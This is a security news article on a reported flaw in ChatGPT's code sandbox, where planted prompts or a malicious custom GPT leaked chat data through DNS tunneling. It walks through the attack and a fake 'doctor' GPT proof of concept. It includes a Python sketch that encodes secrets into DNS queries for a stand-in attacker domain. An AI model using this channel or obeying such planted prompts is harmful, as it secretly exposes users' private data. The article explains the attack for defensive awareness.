The invisible risk: Can you really trust your ‘private’ AI assistant to keep your secrets?
Check Point Software Technologies discovered a vulnerability in ChatGPT’s internal runtime used for data analysis and Python tasks: even though normal outbound web traffic was blocked, DNS resolution remained available and could be abused for DNS tunneling. By embedding malicious logic in a prompt—or more insidiously, in a custom GPT—an attacker could turn ordinary user interactions into a covert exfiltration channel, hiding small chunks of data inside DNS lookup requests that would not trigger ChatGPT’s usual external-transfer safeguards, such as GPT Actions consent prompts.

The research shows that once a user pasted a booby-trapped prompt or interacted with a malicious custom GPT, subsequent conversation contents, uploaded files, and especially the model’s own distilled summaries and conclusions could be siphoned off to an attacker-controlled server without any onscreen warning. Check Point emphasizes that this is more damaging than raw document theft, because extracted insights (e.g., key clauses from a 30-page contract, likely medical diagnoses, or a distilled risk assessment from a financial spreadsheet) are exactly what attackers value most.

In a proof-of-concept, the researchers built a fake “personal doctor” GPT that appeared to behave normally while silently transmitting both the patient’s identity from uploaded lab results and the model’s medical assessment via DNS tunneling. Beyond exfiltration, the same DNS-based channel could carry commands back into the Linux container hosting the code execution environment, effectively giving remote shell-like control that remained invisible in the chat UI.

Check Point reported the issue to OpenAI; the company said it had already identified the underlying problem and fully deployed a fix on February 20, 2026.
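To make the mechanism concrete, here is a minimal sketch of how DNS tunneling encodes data into lookups. This is an illustrative reconstruction, not Check Point’s actual payload: the domain `exfil.example.com` and the chunking scheme are assumptions. Data is base32-encoded (DNS names allow only letters, digits, and hyphens), split to respect the 63-byte limit per DNS label, and prefixed with a sequence number so the attacker’s authoritative nameserver, which sees every query for its domain, can reassemble the secret even though no HTTP request ever leaves the sandbox.

```python
import base64

MAX_LABEL = 63  # DNS restricts each dot-separated label to 63 bytes


def encode_chunks(secret: bytes, exfil_domain: str) -> list[str]:
    """Split a secret into DNS-safe labels and build query names.

    Base32 keeps each chunk within the DNS letter/digit alphabet;
    a leading sequence label lets the receiving server reorder chunks.
    """
    b32 = base64.b32encode(secret).decode().rstrip("=").lower()
    chunks = [b32[i:i + MAX_LABEL] for i in range(0, len(b32), MAX_LABEL)]
    # One query name per chunk: <seq>.<data>.<attacker domain>
    return [f"{i}.{chunk}.{exfil_domain}" for i, chunk in enumerate(chunks)]


# Resolving these names (e.g. via socket.getaddrinfo) would leak the
# payload to whoever runs DNS for exfil_domain, even when ordinary
# outbound web traffic is blocked. The lookups are omitted here.
queries = encode_chunks(b"diagnosis: example", "exfil.example.com")
```

The attacker’s server simply logs incoming queries, strips the domain suffix, sorts by the sequence label, and base32-decodes the concatenated chunks to recover the original bytes.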
The article stresses that the incident underscores a broader structural risk: as AI assistants become full-fledged workspaces for code, document analysis, and sensitive decision support, trust hinges not just on model behavior but on the integrity of hidden runtime layers that most users cannot audit. The piece urges more cautious handling of prompts and custom GPTs, and calls for hands-on, continuously monitored security practices across AI platforms such as ChatGPT, Claude, and Gemini.